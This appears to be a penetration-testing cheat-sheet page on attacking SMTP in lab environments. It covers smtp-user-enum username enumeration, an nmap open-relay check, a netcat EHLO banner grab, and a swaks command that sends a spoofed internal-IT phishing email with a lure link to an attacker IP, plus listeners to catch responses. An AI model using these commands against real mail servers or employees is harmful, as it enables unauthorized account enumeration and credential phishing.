SMTP

  • Enum users

    • VRFY verifies the existence of a user on a server, while RCPT TO identifies the recipient of a message. While both can be used for username enumeration, VRFY provides direct information about user validity, whereas RCPT TO indirectly confirms a valid recipient by accepting a valid address and rejecting an invalid one. 

smtp-user-enum -M VRFY -U wordlist -t 10.129.8.39 -w 20 -v -m 1

smtp-user-enum -M RCPT -U /usr/share/seclists/Usernames/Honeypot-Captures/multiplesources-users-fabian-fingerle.de.txt -D humongousretail.com -t 10.13.38.12 -m 50

#adjust timout(-w) and worker/ threads (-m)

  • Nmap - Open Relay

nmap 10.129.14.128 -p25 --script smtp-open-relay -v

  • nc /Telnet - HELO/EHLO

└──╼ [★]$ nc -nv 10.129.8.39 25
(UNKNOWN) [10.129.8.39] 25 (smtp) open
220 InFreight ESMTP v2.11
HELO mail1.inlanefreight.htb
250 mail1
EHLO mail1
250-mail1
250-PIPELINING
250-SIZE 10240000
250-VRFY
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250-DSN
250-SMTPUTF8
250 CHUNKING

  • Phishing emails

swaks --to sales@humongousretail.com --from it@humongousretail.com --header "Subject: Credentials / Errors" --body "citrix http://10.14.15.41/" --server humongousretail.com

#and put listener
python3 -m http.server 80 
#OR
nc -nlvp 80
PreviousNFSNextSNMP

Last updated